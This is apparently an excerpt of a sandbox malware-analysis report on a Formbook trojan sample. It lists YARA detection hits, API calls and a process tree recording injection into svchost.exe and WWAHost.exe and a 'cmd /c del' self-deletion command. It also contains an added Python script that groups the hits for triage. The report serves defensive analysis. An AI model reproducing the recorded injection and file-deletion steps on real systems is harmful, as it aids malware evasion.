          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F70E9 | 2_2_039F70E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF0E0 | 2_2_039FF0E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF7B0 | 2_2_039FF7B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F16CC | 2_2_039F16CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985630 | 2_2_03985630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DD5B0 | 2_2_039DD5B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A095C3 | 2_2_03A095C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7571 | 2_2_039F7571
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF43F | 2_2_039FF43F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03931460 | 2_2_03931460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FB80 | 2_2_0395FB80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B5BF0 | 2_2_039B5BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397DBF9 | 2_2_0397DBF9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFB76 | 2_2_039FFB76
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DDAAC | 2_2_039DDAAC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985AA0 | 2_2_03985AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E1AA3 | 2_2_039E1AA3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EDAC6 | 2_2_039EDAC6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFA49 | 2_2_039FFA49
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7A46 | 2_2_039F7A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B3A6C | 2_2_039B3A6C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D5910 | 2_2_039D5910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949950 | 2_2_03949950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B950 | 2_2_0395B950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039438E0 | 2_2_039438E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AD800 | 2_2_039AD800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03941F92 | 2_2_03941F92
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFFB1 | 2_2_039FFFB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD2 | 2_2_03903FD2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03903FD5 | 2_2_03903FD5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFF09 | 2_2_039FFF09
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949EB0 | 2_2_03949EB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FDC0 | 2_2_0395FDC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F1D5A | 2_2_039F1D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03943D40 | 2_2_03943D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7D73 | 2_2_039F7D73
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFCF2 | 2_2_039FFCF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B9C32 | 2_2_039B9C32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AA036 | 2_2_038AA036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AB232 | 2_2_038AB232
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038A1082 | 2_2_038A1082
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE5CD | 2_2_038AE5CD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038A5B32 | 2_2_038A5B32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038A5B30 | 2_2_038A5B30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038A8912 | 2_2_038A8912
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038A2D02 | 2_2_038A2D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060B232 | 3_2_1060B232
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060A036 | 3_2_1060A036
          Source: C:\Windows\explorer.exe | Code function: 3_2_10601082 | 3_2_10601082
          Source: C:\Windows\explorer.exe | Code function: 3_2_10605B30 | 3_2_10605B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_10605B32 | 3_2_10605B32
          Source: C:\Windows\explorer.exe | Code function: 3_2_10602D02 | 3_2_10602D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_10608912 | 3_2_10608912
          Source: C:\Windows\explorer.exe | Code function: 3_2_1060E5CD | 3_2_1060E5CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B94082 | 3_2_10B94082
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B9D036 | 3_2_10B9D036
          Source: C:\Windows\explorer.exe | Code function: 3_2_10BA15CD | 3_2_10BA15CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B9B912 | 3_2_10B9B912
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B95D02 | 3_2_10B95D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B9E232 | 3_2_10B9E232
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B98B30 | 3_2_10B98B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_10B98B32 | 3_2_10B98B32
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: String function: 00467F41 appears 35 times
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: String function: 00480D27 appears 70 times
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: String function: 00488B40 appears 42 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 111 times
          Source: PI916810.exe, 00000000.00000003.2031782718.000000000391D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PI916810.exe
          Source: PI916810.exe, 00000000.00000003.2030240477.0000000003773000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PI916810.exe
          Source: PI916810.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: PI916810.exe PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: WWAHost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
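          The YARA hits above are more useful once they are grouped per process and read together with the memory-region attributes encoded in each dump name: the same Formbook rules fire in the loader (process 0, a PAGE_READWRITE private region holding the decoded payload) and in the two hollowed system binaries (svchost.exe at 0x3840000 and WWAHost.exe at 0x210000, both PAGE_EXECUTE_READWRITE and not image-backed), which is the memory footprint of injected code. The script below is an added triage example, not part of the Joe Sandbox report or its tooling. It assumes that the fifth dot-separated field of the .sdmp name is the Win32 page protection and the seventh is the allocation type; that layout is inferred from the values on this page, not taken from vendor documentation, and the sample lines are trimmed copies of the hits above.

```python
import re
from collections import defaultdict

# Constructed sample: three region hits and one process-wide string hit copied
# from the report, with the rule metadata trimmed after the rule name.
SAMPLE_HITS = """\
Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1
Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook
Source: Process Memory Space: svchost.exe PID: 6300, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116
"""

# Process index (first field of the dump name) -> image, from this report's process tree.
PROCESS_NAMES = {0: "PI916810.exe", 2: "svchost.exe", 3: "explorer.exe", 4: "WWAHost.exe"}

# Win32 PAGE_* and MEM_* constants. ASSUMPTION: field 5 of the dump name is the
# page protection and field 7 the allocation type (inferred from this page's
# values 0x40/0x04 and 0x20000/0x40000); fields 6 and 8 are left undecoded.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

SDMP_RE = re.compile(
    r"Source: (?P<proc>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp, type: MEMORY.*?"
    r"Matched rule: (?P<rule>\S+)")
STR_RE = re.compile(
    r"Source: Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+), "
    r"type: MEMORYSTR.*?Matched rule: (?P<rule>\S+)")


def parse_hits(text):
    """Turn 'Matched rule' lines into dicts; region hits get the dump name decoded."""
    hits = []
    for line in text.splitlines():
        m = SDMP_RE.search(line)
        if m:
            hits.append({"kind": "region", "proc_index": int(m["proc"], 16),
                         "base": int(m["base"], 16), "protect": int(m["prot"], 16),
                         "mem_type": int(m["type"], 16), "rule": m["rule"]})
            continue
        m = STR_RE.search(line)
        if m:
            hits.append({"kind": "strings", "image": m["image"],
                         "pid": int(m["pid"]), "rule": m["rule"]})
    return hits


def is_executable(protect):
    # PAGE_EXECUTE (0x10), _READ (0x20), _READWRITE (0x40), _WRITECOPY (0x80)
    return bool(protect & 0xF0)


def triage(hits):
    """Group hits per process; flag executable memory that is not backed by an image section."""
    findings = defaultdict(list)
    for h in hits:
        if h["kind"] == "strings":
            findings[h["image"]].append({"base": None, "protect": None, "mem_type": None,
                                         "rule": h["rule"], "suspicious": None,
                                         "note": f"string hit in PID {h['pid']}"})
            continue
        name = PROCESS_NAMES.get(h["proc_index"], f"process#{h['proc_index']}")
        # Code running from RWX/RX memory that was never mapped from a PE file is the
        # signature of hollowing or shellcode injection; a decoded payload sitting in
        # a plain RW buffer (the loader's case here) is staged data, not yet running.
        suspicious = is_executable(h["protect"]) and h["mem_type"] != MEM_IMAGE
        findings[name].append({
            "base": f"0x{h['base']:X}",
            "protect": PAGE_PROTECT.get(h["protect"], f"0x{h['protect']:X}"),
            "mem_type": MEM_TYPE.get(h["mem_type"], f"0x{h['mem_type']:X}"),
            "rule": h["rule"], "suspicious": suspicious, "note": ""})
    return dict(findings)


if __name__ == "__main__":
    for proc, regions in triage(parse_hits(SAMPLE_HITS)).items():
        for r in regions:
            print(proc, r)
```

          With this grouping the report's own story falls out: PI916810.exe holds the decoded payload in writable data (a dropper artefact worth dumping for config extraction), while the executable, non-image regions in svchost.exe and WWAHost.exe are where the payload actually runs and are the regions to carve for further analysis. Confirm the field decode against a few known-good dumps from the same sandbox before relying on it in a pipeline.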
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@301/5@12/1
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CA2D5 GetLastError,FormatMessageW | 0_2_004CA2D5
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B8713 AdjustTokenPrivileges,CloseHandle | 0_2_004B8713
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004B8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 0_2_004B8CC3
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 0_2_004CB59E
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004DF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 0_2_004DF121
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CC602 CoInitialize,CoCreateInstance,CoUninitialize | 0_2_004CC602
          Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_00464FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 0_2_00464FE9
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
          Source: C:\Users\user\Desktop\PI916810.exe | File created: C:\Users\user\AppData\Local\Temp\autA1F0.tmp
          Source: PI916810.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\PI916810.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: PI916810.exe | ReversingLabs: Detection: 28%
          Source: unknown | Process created: C:\Users\user\Desktop\PI916810.exe "C:\Users\user\Desktop\PI916810.exe"
          Source: C:\Users\user\Desktop\PI916810.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI916810.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
